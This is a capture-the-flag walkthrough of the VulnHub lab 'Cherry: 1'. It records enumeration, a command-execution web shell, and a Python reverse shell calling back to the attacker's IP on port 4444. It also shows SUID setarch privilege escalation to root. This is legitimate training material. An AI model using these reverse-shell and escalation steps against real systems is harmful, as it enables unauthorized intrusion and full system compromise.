From aldeid
Jump to navigation Jump to search

VulnHub > Cherry: 1

  • Name: Cherry: 1
  • Date release: 14 Sep 2020
  • Author: SunCSR Team
  • Series: Cherry
  • Difficulty: Easy
  • Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
  • Goal: Get the root shell and then obtain flag under /root.

Services enumeration

There are serveral open ports, including 2 web services, one involving Nginx (port 80) and the other with Apache (port 7755)

22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cherry
7755/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cherry
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web enumeration

Backup directory

Enumerating the web service (port 80) with gobuster reveals the existence of a hidden /backup directory:

[email protected]:/data/CHERRY_1$ gobuster dir -u -w /usr/share/wordlists/dirb/common.txt 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/09/21 08:32:20 Starting gobuster
/backup (Status: 301)
/index.html (Status: 200)
/info.php (Status: 200)
2020/09/21 08:32:20 Finished

Source code disclosure

Accessing the /backup directory via the web browser reveals the files contained in it, as directory listing is enabled. Besides, there is a vulnerability due to the double web server Nginx/Apache. Indeed, Nginx has been configured to deliver static content only (e.g. *.html files), while Apache delivers dynamic content (e.g. *.php files). Hence, accessing a *.php file over port 80 will reveal its source content, as shown below:

$ curl


The /backup directory contains several useless compressed archives, but an interesting command.php file.

$ curl -s | html2text 
****** Index of /backup ******
[[ICO]]       Name             Last_modified    Size Description
[[PARENTDIR]] Parent_Directory                    -  
[[   ]]       command.php      2020-09-07 03:30  293  
[[   ]]       latest.tar.gz    2020-09-01 18:54  12M  
[[   ]]       2020-09-07 03:33  11M  
[[   ]]   2020-09-07 03:34  11M  
     Apache/2.4.41 (Ubuntu) Server at Port 7755

Browsing curl (port 80) will reveal the source code of command.php. This page will execute the command passed as argument ($_GET['backup']).

<?php echo passthru($_GET['backup']); ?>
<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- </?php echo passthru($_GET['backup']); ?/> -->

Below is an example of successful command execution:

$ curl -s

uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- </?php echo passthru($_GET['backup']); ?/> -->

Reverse shell

With this initial foothold, we can now prepare a reverse shell. Let’s start a listener (rlwrap nc -nlvp 4444) and send the following command:,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22172.16.222.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

A reverse shell is spawned in our listener window:

[email protected]:/data/CHERRY_1/files/piranha.core-master$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49634
[email protected]:/var/www/html/backup$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Listing the files owned by root with the SUID bit set reveals an interesting program:

[email protected]:/tmp$ find / -type f -user root -perm -u=s 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
/usr/bin/setarch <------ interesting executable!

Checking on GTFOBins reveals that we can take advantage of it to elevate our privileges to root as the program has the SUID bit set:

[email protected]:/tmp$ /usr/bin/setarch $(arch) /bin/sh -p
/usr/bin/setarch $(arch) /bin/sh -p
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

Root flag

Now elevated to root, we can get the root flag:

# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------  5 root root 4096 Sep  7 04:21 .
drwxr-xr-x 20 root root 4096 Sep  7 02:18 ..
-rw-------  1 root root  164 Sep  7 04:21 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Sep  7 02:33 .local
-rw-------  1 root root   18 Sep  7 02:37 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4096 Sep  7 02:21 .ssh
-rw-r--r--  1 root root  255 Sep  7 04:13 .wget-hsts
-rw-r--r--  1 root root   46 Sep  7 04:20 proof.txt
drwxr-xr-x  3 root root 4096 Sep  7 02:21 snap
# cat proof.txt
cat proof.txt


blog comments powered by Disqus

Keywords: ctf vulnhub cherry command injection setarch